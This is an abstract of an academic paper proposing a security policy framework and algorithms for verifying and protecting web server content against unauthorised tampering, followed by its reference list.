Security policy framework and algorithms for web server content protection

A significant web security issue facing Internet users and organizations is the securing of web content against unauthorised tampering. Users must be comfortable with the security offered by web applications that sensitive web-based services. Some progress has been made in addressing the verification of web server content integrity, but current solutions are restricted by the limitations of the SSL protocol, the statelessness of HTTP, blind security mechanisms which is based on ad-hoc models, and difficulties with automatic code analysis. We present a web security real-time framework, a state protocol of web policies, and a number of particular algorithms that they can used to verify and protect the static and dynamic web content against unauthorised tampering. It is suggested that such a framework will offer a higher level of user confidence, and web service survivability.

[1]  Richard Sharp,et al.  Specifying and Enforcing Application-Level Web Security Policies , 2003, IEEE Trans. Knowl. Data Eng..

[2]  Marko Hassinen,et al.  Client controlled security for Web applications , 2005, The IEEE Conference on Local Computer Networks 30th Anniversary (LCN'05)l.

[3]  Bob Gehling,et al.  eCommerce security , 2005, InfoSecCD '05.

[4]  Josef Pieprzyk,et al.  On-the-fly web content integrity check boosts users' confidence , 2002, CACM.

[5]  Helen J. Wang,et al.  BrowserShield: vulnerability-driven filtering of dynamic HTML , 2006, OSDI '06.

[6]  Magnus Almgren,et al.  An Architecture for an Adaptive Intrusion-Tolerant Server , 2002, Security Protocols Workshop.

[7]  A. Jefferson Offutt,et al.  Bypass testing of Web applications , 2004, 15th International Symposium on Software Reliability Engineering.

[8]  Tony Kuphaldt Lessons In Electric Circuits, Volume IV – Digital , 2007 .

[9]  Daniel E. Geer,et al.  A survey of Web security , 1998, Computer.

[10]  Ralph C. Merkle,et al.  A Certified Digital Signature , 1989, CRYPTO.

[11]  Carlos Coronado On the security and the efficiency of the Merkle signature scheme , 2005, IACR Cryptol. ePrint Arch..

[12]  Brian A. Malloy,et al.  An application-centered course on data-driven web sites , 2001, 31st Annual Frontiers in Education Conference. Impact on Engineering and Science Education. Conference Proceedings (Cat. No.01CH37193).